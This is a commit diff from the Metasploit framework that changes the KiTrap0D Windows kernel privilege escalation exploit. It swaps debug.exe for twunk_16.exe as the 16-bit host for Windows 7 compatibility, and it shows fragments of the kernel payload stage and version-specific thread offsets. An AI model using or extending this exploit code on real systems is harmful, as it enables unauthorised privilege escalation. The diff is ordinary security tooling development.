Switch to twunk_16 for Windows 7 compatibility

git-svn-id: file:///home/svn/framework3/trunk@8230 4d416f70-5f16-0410-b530-b9f4589650da

external/source/kitrap0d/vdmallowed.c

@@ -46,7 +46,9 @@
 // Long-term, this will be reimplemented as an additional vector in the priv
 // extension.
 //
-// - hdm[at]metasploit.com 2010/01/19
+// This code now uses twunk_16.exe instead of debug.exe for compatibility.
+//
+// - hdm[at]metasploit.com 2010/01/25
 //
 
 
@@ -134,8 +136,8 @@ int main(int argc, char **argv)
 		"\n"
 		);
 
-    GetSystemDirectory(VDMPath, 1024);
-    _tcscat_s(VDMPath, _MAX_PATH, _T("\\debug.exe"));
+	GetWindowsDirectory(VDMPath, 1024);
+	_tcscat_s(VDMPath, _MAX_PATH, _T("\\twunk_16.exe"));
 
 	GetSystemDirectory(CMDPath, 1024);
 	_tcscat_s(CMDPath, _MAX_PATH, _T("\\cmd.exe"));

external/source/kitrap0d/vdmexploit.c

@@ -12,11 +12,6 @@
 // This file contains the exploit payload and VDM Subsystem control routines.
 //
 
-// This file has been modified from the original:
-//     * The CurrentThread is now much more precise thanks to research/code from Pusscat
-//     * The Sleep(1000) call before triggering the bug avoids a rare race condition in thread initialization
-//     * The ZwTerminateProcess path has been updated to flip back to the kernel stack first
-
 #ifndef WIN32_NO_STATUS
 # define WIN32_NO_STATUS // I prefer the definitions from ntstatus.h
 #endif
@@ -80,8 +75,8 @@ BOOL    FindAndReplaceMember(PDWORD, DWORD, DWORD, DWORD, BOOL);
 BOOL	CheckAndReplace(PDWORD, DWORD, DWORD, DWORD);
 
 DWORD	ethreadOffsets[] =	{	0x6,	// WinXP SP3, VistaSP2
-								0xA		// Windows 7, VistaSP1
-							};
+0xA		// Windows 7, VistaSP1
+};
 
 // This routine is where I land after successfully triggering the vulnerability.
 VOID FirstStage()
@@ -100,7 +95,7 @@ VOID FirstStage()
 	DWORD i;
 	LIST_ENTRY *ThreadListHead;
 	HANDLE pid;
-    DWORD pret;
+	HANDLE pret;
 
 	// Keep interrupts off until I've repaired my KTHREAD.
 	__asm cli